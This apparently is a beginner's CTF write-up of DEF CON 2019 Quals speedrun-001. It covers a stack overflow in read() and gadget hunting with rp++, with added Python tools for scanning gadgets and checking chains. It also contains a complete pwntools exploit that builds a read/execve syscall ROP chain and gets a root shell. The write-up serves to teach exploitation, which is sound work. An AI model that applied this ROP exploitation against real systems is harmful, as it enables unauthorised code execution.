
[2019 DefCon Quals] speedrun-001

Intro

Hello :D

A little while ago I poked at the DEFCON 2019 Quals problems!!

..well, "poked" is generous, I mostly just watched ㅠㅠㅠ

Here I want to go through speedrun-001, the one I struggled with the most.

Once I had solved it, it turned out to be so simple that I was a bit embarrassed.. If only I'd had IDA I would have solved it haha!!

Let's get right into it.

Write UP

root@goorm:/tmp/DEFCON/speedrun# ./speedrun-001
Hello brave new challenger
Any last words?
nononono
This will be the last thing that you say: nononono

Alas, you had no luck today.

It asks whether you have any last words, then takes input.

Something tells me a BOF is about to happen.

root@goorm:/tmp/DEFCON/speedrun# ./speedrun-001
Hello brave new challenger
Any last words?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaa

Segmentation fault (core dumped)

Segmentation fault!!! A BOF, as expected.

Shall we tear it open in IDA?? ..except I don't have IDA, so I borrowed this decompilation ㅠㅠ

__int64 sub_400B60()
{
    char buf; // [rsp+0h] [rbp-400h]  -> a 0x400 = 1024-byte stack buffer

    sub_410390("Any last words?");                 // prints the prompt
    read(0, &buf, 2000uLL);                        // up to 2000 bytes into a 1024-byte buffer: stack overflow
    return sub_40F710("This will be the last thing that you say: %s\n", &buf); // printf-style echo of buf
}

As expected, the overflow is in read(): buf sits 0x400 (1024) bytes below rbp, but read() may write 2000 bytes into it. So the saved rbp is at offset 1024 and the return address at offset 1032.

Let's check the mitigations too.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Only NX is on, so this smells like ROP. No canary, no PIE: every address in the binary is fixed. The objdump output below also shows glibc sections (__libc_thread_subfreeres, __libc_freeres_ptrs) linked straight into the binary, i.e. it is statically linked, which is why we will find plain syscall gadgets inside it.

A simple plan:

1. read() "/bin/sh" into a writable, fixed address

2. execve() it

That should do it.

I'll exploit it with raw syscalls.

The syscall instruction dispatches on the number in rax.

read()'s syscall number is 0, and as you know it takes three arguments: fd, buf, count.

execve()'s syscall number is 59, and it also takes three: pathname, argv, envp.

To feed those arguments through the ROP chain we need gadgets.

On 32-bit a single pop;pop;pop;ret was enough because the arguments sit on the stack, but 64-bit is a bit different.

Arguments go in registers, in the order rdi, rsi, rdx, ... (for a syscall the fourth would be r10 rather than the rcx of the function-call convention, but we only need three here), so we need a separate pop gadget for each register, plus one for rax.

The addresses we need:

1. pop rax ; ret :

2. pop rdi ; ret :

3. pop rsi ; ret :

4. pop rdx ; ret :

5. syscall ; ret :

6. .bss address to store "/bin/sh" :

The gadgets can be found with rp++!

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rax ; ret"
0x00415664: pop rax ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rdi ; ret"
0x00400686: pop rdi ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rsi ; ret"
0x004101f3: pop rsi ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "pop rdx ; ret"
0x0044be16: pop rdx ; ret  ;  (1 found)

root@goorm:/tmp/DEFCON/speedrun# rp-lin-x64 -f speedrun-001 -r 1 | grep "syscall"
0x00474e65: syscall  ; ret  ;  (1 found)

The .bss address comes from objdump.

root@goorm:/tmp/DEFCON/speedrun# objdump -x ./speedrun-001
.
.
Sections:
Idx Name          Size      VMA               LMA               File off  Algn
.
.
 24 __libc_thread_subfreeres 00000008  00000000006bb2d0  00000000006bb2d0  000bb2d0  2**3
                  CONTENTS, ALLOC, LOAD, DATA
 25 .bss          000016f8  00000000006bb2e0  00000000006bb2e0  000bb2d8  2**5
                  ALLOC
 26 __libc_freeres_ptrs 00000028  00000000006bc9d8  00000000006bc9d8  000bb2d8  2**3
                  ALLOC
 27 .comment      0000002a  0000000000000000  0000000000000000  000bb2d8  2**0
                  CONTENTS, READONLY
 28 .note.stapsdt 000014cc  0000000000000000  0000000000000000  000bb304  2**2
                  CONTENTS, READONLY
SYMBOL TABLE:
no symbols
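Neither lookup really needs rp++ or objdump. The following is an added example (not part of the original write-up): a pure-Python scanner that reads the ELF64 program and section headers with struct, searches every executable segment for the exact byte encodings of the five gadgets, and reads the .bss VMA from the section header table. Run against ./speedrun-001 it reports the same kind of addresses as above; with no argument it runs on a constructed toy ELF whose layout and addresses (text at 0x400000, .bss at 0x6bb2e0) are assumptions made for the demonstration, not the challenge binary.

```python
import struct
import sys

# x86-64 encodings of the five one-instruction gadgets the chain needs.
# The opcodes are fixed by the ISA; the addresses are what we search for.
GADGET_BYTES = {
    "pop rax ; ret": b"\x58\xc3",
    "pop rdi ; ret": b"\x5f\xc3",
    "pop rsi ; ret": b"\x5e\xc3",
    "pop rdx ; ret": b"\x5a\xc3",
    "syscall ; ret": b"\x0f\x05\xc3",
}

EHDR = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr
PHDR = "<IIQQQQQQ"           # Elf64_Phdr
SHDR = "<IIQQQQIIQQ"         # Elf64_Shdr


def find_gadgets(code: bytes, base: int) -> dict:
    """Return {gadget: lowest virtual address} for each gadget present in a
    blob of executable bytes mapped at `base`. x86 has no instruction
    alignment, so a hit inside a longer instruction is still usable; that is
    the same trick rp++ relies on."""
    found = {}
    for name, pat in GADGET_BYTES.items():
        off = code.find(pat)
        if off != -1:
            found[name] = base + off
    return found


def exec_segments(elf: bytes):
    """Yield (vaddr, bytes) for every PT_LOAD segment that has PF_X set."""
    hdr = struct.unpack_from(EHDR, elf, 0)
    phoff, phentsize, phnum = hdr[5], hdr[9], hdr[10]
    for i in range(phnum):
        p_type, p_flags, p_off, p_vaddr, _, p_filesz, _, _ = struct.unpack_from(
            PHDR, elf, phoff + i * phentsize)
        if p_type == 1 and p_flags & 1:            # PT_LOAD and PF_X
            yield p_vaddr, elf[p_off:p_off + p_filesz]


def gadgets_in_elf(elf: bytes) -> dict:
    """Scan all executable segments; keep the lowest address per gadget."""
    found = {}
    for vaddr, code in exec_segments(elf):
        for name, addr in find_gadgets(code, vaddr).items():
            found[name] = min(addr, found.get(name, addr))
    return found


def section_vma(elf: bytes, wanted: str) -> int:
    """Look a section up by name in the section header table (the VMA
    column of `objdump -x`)."""
    hdr = struct.unpack_from(EHDR, elf, 0)
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    shdr = lambda i: struct.unpack_from(SHDR, elf, shoff + i * shentsize)
    strtab = shdr(shstrndx)[4]                     # sh_offset of .shstrtab
    for i in range(shnum):
        s = shdr(i)
        name = elf[strtab + s[0]:elf.index(b"\x00", strtab + s[0])]
        if name == wanted.encode():
            return s[3]                            # sh_addr
    raise KeyError(wanted)


# Constructed sample code (not from the challenge): 4 NOPs, pop rax;ret,
# 3 INT3, pop rdi;ret, syscall;ret. It only exercises the scanner.
SAMPLE_CODE = b"\x90" * 4 + b"\x58\xc3" + b"\xcc" * 3 + b"\x5f\xc3" + b"\x0f\x05\xc3"


def build_sample_elf(code: bytes = SAMPLE_CODE, code_vaddr: int = 0x400000,
                     bss_vaddr: int = 0x6bb2e0) -> bytes:
    """Constructed minimal ELF64 (parseable, not loadable): one RX PT_LOAD
    segment holding `code`, plus .text/.bss/.shstrtab section headers.
    The addresses are assumptions chosen to mirror the write-up."""
    shstr = b"\x00.text\x00.bss\x00.shstrtab\x00"
    code_off = 64 + 56                             # right after Ehdr + one Phdr
    shstr_off = code_off + len(code)
    shoff = shstr_off + len(shstr)
    ehdr = struct.pack(EHDR, b"\x7fELF\x02\x01\x01" + b"\x00" * 9, 2, 0x3e, 1,
                       code_vaddr, 64, shoff, 0, 64, 56, 1, 64, 4, 3)
    phdr = struct.pack(PHDR, 1, 5, code_off, code_vaddr, code_vaddr,
                       len(code), len(code), 0)    # PT_LOAD, PF_R|PF_X
    sh = lambda n, t, f, a, o, sz: struct.pack(SHDR, n, t, f, a, o, sz, 0, 0, 1, 0)
    shdrs = (sh(0, 0, 0, 0, 0, 0)
             + sh(1, 1, 6, code_vaddr, code_off, len(code))        # .text
             + sh(7, 8, 3, bss_vaddr, shstr_off, 0x16f8)           # .bss (NOBITS)
             + sh(12, 3, 0, 0, shstr_off, len(shstr)))             # .shstrtab
    return ehdr + phdr + code + shstr + shdrs


if __name__ == "__main__":
    # Usage: python3 gadgets.py ./speedrun-001   (no argument: the sample ELF)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    for name, addr in sorted(gadgets_in_elf(data).items(), key=lambda kv: kv[1]):
        print(f"{addr:#010x}: {name}")
    print(f"{section_vma(data, '.bss'):#010x}: .bss")
```

find_gadgets only keeps the first hit per gadget, which is all a fixed-address chain needs; rp++ with a larger -r value would also list longer sequences ending in ret, which this scanner deliberately ignores.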

1. pop rax ; ret : 0x415664

2. pop rdi ; ret : 0x400686

3. pop rsi ; ret : 0x4101f3

4. pop rdx ; ret : 0x44be16

5. syscall ; ret : 0x474e65

6. .bss address to store "/bin/sh" : 0x6bb2e0

All the pieces are collected!!

Let's put them together.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

p = process("./speedrun-001")

# Gadget and data addresses (non-PIE static binary, so they are fixed)
pop_rax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x44be16
syscall_addr = 0x474e65
bss_addr = 0x6bb2e0

payload = b""

# Fill buf (0x400 bytes) + saved rbp (8 bytes) up to the return address
payload += b"A" * 1032

# rax = 0: read(0, .bss, 8) stores "/bin/sh\x00" in .bss
payload += p64(pop_rax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(bss_addr)
payload += p64(pop_rdx)
payload += p64(len(b"/bin/sh\x00"))
payload += p64(syscall_addr)

# rax = 59: execve(.bss, NULL, NULL), get a shell
payload += p64(pop_rax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(bss_addr)
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall_addr)

p.recvuntil(b"words?\n")
p.send(payload)
# Wait for the echo before sending the second stage: the first read() accepts
# up to 2000 bytes, so "/bin/sh" sent too early could be swallowed by it
p.recvuntil(b"say: ")
p.send(b"/bin/sh\x00")

p.interactive()

That is hahaha.py. I wasted a long time because I had copied an address wrong hahaha

root@goorm:/tmp/DEFCON/speedrun# ./hahaha.py
[+] Starting local process './speedrun-001': pid 1709
[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdVA
$ whoami
root

Exploit!! The "dVA" at the end of the echoed A's is a nice confirmation: printf's %s prints up to the first NUL byte, and right after the 1032 bytes of padding come the bytes of the first gadget address, 0x415664 = 64 56 41 00, i.e. "dVA" followed by a NUL.
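Because a mis-copied gadget address is the easiest way to lose time on a chain like this, here is an added example (not the write-up's own code, and it needs no pwntools) that builds the same two-syscall chain with struct and then decodes it slot by slot the way the CPU will consume it: every slot must be one of the five known gadget addresses, a pop gadget eats the next slot as its value, and anything else is rejected before the process ever crashes. echo_preview reproduces what the program's printf("%s") echoes back, which is where the "dVA" in the output above comes from. The addresses and the 1032-byte offset are the ones from this write-up.

```python
import struct

# Addresses from the write-up above (non-PIE static binary, so they are fixed)
GADGETS = {
    "pop rax ; ret": 0x415664,
    "pop rdi ; ret": 0x400686,
    "pop rsi ; ret": 0x4101f3,
    "pop rdx ; ret": 0x44be16,
    "syscall ; ret": 0x474e65,
}
BSS = 0x6bb2e0
OFFSET = 0x400 + 8          # buf at rbp-0x400, then saved rbp, then the return address
SYS_READ, SYS_EXECVE = 0, 59


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def syscall_frame(g: dict, nr: int, rdi: int, rsi: int, rdx: int) -> bytes:
    """One 'load rax/rdi/rsi/rdx, then syscall' unit. The kernel dispatches
    on rax and takes the first three arguments from rdi, rsi, rdx (a fourth
    would go in r10, not the rcx of the function-call ABI)."""
    return b"".join([
        p64(g["pop rax ; ret"]), p64(nr),
        p64(g["pop rdi ; ret"]), p64(rdi),
        p64(g["pop rsi ; ret"]), p64(rsi),
        p64(g["pop rdx ; ret"]), p64(rdx),
        p64(g["syscall ; ret"]),
    ])


def build_payload(g: dict = GADGETS, bss: int = BSS, offset: int = OFFSET) -> bytes:
    """Padding + read(0, bss, 8) + execve(bss, NULL, NULL)."""
    sh = b"/bin/sh\x00"
    return (b"A" * offset
            + syscall_frame(g, SYS_READ, 0, bss, len(sh))
            + syscall_frame(g, SYS_EXECVE, bss, 0, 0))


def decode_chain(chain: bytes, g: dict = GADGETS) -> list:
    """Replay the chain as the CPU would and return [(reg, value), ...,
    ('syscall', None), ...]. A slot that is not a known gadget (for example
    0x4001f3 copied instead of 0x4101f3) raises ValueError."""
    by_addr = {addr: name for name, addr in g.items()}
    slots = [struct.unpack_from("<Q", chain, o)[0] for o in range(0, len(chain), 8)]
    ops, i = [], 0
    while i < len(slots):
        name = by_addr.get(slots[i])
        if name is None:
            raise ValueError(f"slot {i}: {slots[i]:#x} is not a known gadget")
        if name.startswith("pop "):
            if i + 1 >= len(slots):
                raise ValueError(f"slot {i}: {name} has no value to pop")
            ops.append((name.split()[1], slots[i + 1]))
            i += 2
        else:
            ops.append(("syscall", None))
            i += 1
    return ops


def echo_preview(payload: bytes) -> bytes:
    """What printf("%s") echoes back: everything up to the first NUL byte,
    i.e. the padding plus the low bytes of the first gadget address."""
    return payload.split(b"\x00", 1)[0]


if __name__ == "__main__":
    pl = build_payload()
    print(f"payload: {len(pl)} bytes; echo will end with {echo_preview(pl)[-3:]!r}")
    for reg, val in decode_chain(pl[OFFSET:]):
        print(f"  {reg:<8}" + ("" if val is None else f"{val:#x}"))
```

Running it prints the ten register loads and syscalls in order; swap any address in GADGETS for a typo and decode_chain names the offending slot instead of leaving you to stare at a segfault.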

Wrap-up

I somehow ended up solving the first pwnable I ever ran into at a competition.

If I had studied 64-bit ROP just a little earlier I could have solved it during the contest.. a shame ㅠㅠ

Still, it feels good!! haha All that digging paid off.

I plan to keep going with the speedrun series!! See you next time :D
